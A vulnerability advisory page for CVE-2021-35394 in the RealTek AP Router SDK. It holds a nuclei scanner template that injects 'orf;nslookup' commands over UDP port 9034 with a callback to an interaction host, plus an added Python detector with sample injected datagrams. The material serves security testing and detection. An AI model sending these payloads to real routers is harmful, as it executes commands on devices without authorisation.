CVE-2021-35394: RealTek AP Router SDK - Arbitrary Command Injection

Date: 2025-08-01 | Affected software: RealTek AP Router SDK | PoC: public

Vulnerability description

The SDK exposes a UDP server that allows remote execution of arbitrary commands.

PoC code [public]

id: CVE-2021-35394

info:
  name: RealTek AP Router SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  remediation: Apply the latest security patches or updates provided by RealTek.
  description: The SDK exposes a UDP server that allows remote execution of arbitrary commands.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35394
    - https://blogs.juniper.net/en-us/threat-research/realtek-cve-2021-35394-exploited-in-the-wild
  classification:
    epss-score: 0.94335
    epss-percentile: 0.99948
  tags: cve,cve2021,realtek,rce,kev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = `orf;nslookup ${OAST}`
      let data = message;
      packet.WriteString(data)
      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());

    args:
      Host: "{{Host}}"
      Port: 9034
      OAST: "{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100bdb3299998de00aef8339a48f2731711a02c6300d50ff09292275d2c63579b84022100b8afc6a52e75d5f831b6cfaffc956d544fe74940fe530b8cb1c2e462f3cb4829:922c64590222798bb761d5b6d8e72950
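A defender-side check for the traffic shape the template above produces (a UDP datagram to port 9034 whose body starts with "orf" followed by a shell separator), written as an added example that is not part of this page or the nuclei project. It assumes datagrams have already been captured and decoded; the sample datagrams and addresses are constructed.

```python
# Added example (not from this page or the nuclei project): flag UDP datagrams
# shaped like the PoC above, i.e. sent to port 9034 with an "orf" prefix followed
# by shell metacharacters. Packet capture and decoding are out of scope; the
# datagrams below are constructed by hand.
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

TARGET_PORT = 9034                      # UDP port used by the PoC on this page
# Any shell separator or substitution character after the "orf" prefix is suspicious.
SHELL_META = re.compile(rb"[;|&`$]")


@dataclass
class Datagram:
    src: str        # source address (constructed sample values below)
    dst_port: int   # UDP destination port
    payload: bytes  # raw datagram body


def is_exploit_attempt(dg: Datagram) -> bool:
    """True when the datagram matches the CVE-2021-35394 PoC shape."""
    if dg.dst_port != TARGET_PORT:
        return False
    body = dg.payload.strip().lower()
    if not body.startswith(b"orf"):
        return False
    # The PoC places the injected command right after "orf;". Assumption: other
    # shell separators after the prefix are treated the same way.
    return SHELL_META.search(body[3:]) is not None


def scan(datagrams: Iterable[Datagram]) -> List[Tuple[str, bytes]]:
    """Return (source, payload) for every datagram that looks like an attempt."""
    return [(dg.src, dg.payload) for dg in datagrams if is_exploit_attempt(dg)]


# Constructed sample capture: one PoC-style probe, one bare "orf" datagram with
# no injected command, and one datagram on an unrelated port.
SAMPLE = [
    Datagram("198.51.100.7", 9034, b"orf;nslookup probe.oast.example"),
    Datagram("203.0.113.5", 9034, b"orf"),
    Datagram("203.0.113.9", 53, b"orf;id"),
]

if __name__ == "__main__":
    for src, payload in scan(SAMPLE):
        print(f"CVE-2021-35394 probe from {src}: {payload!r}")
```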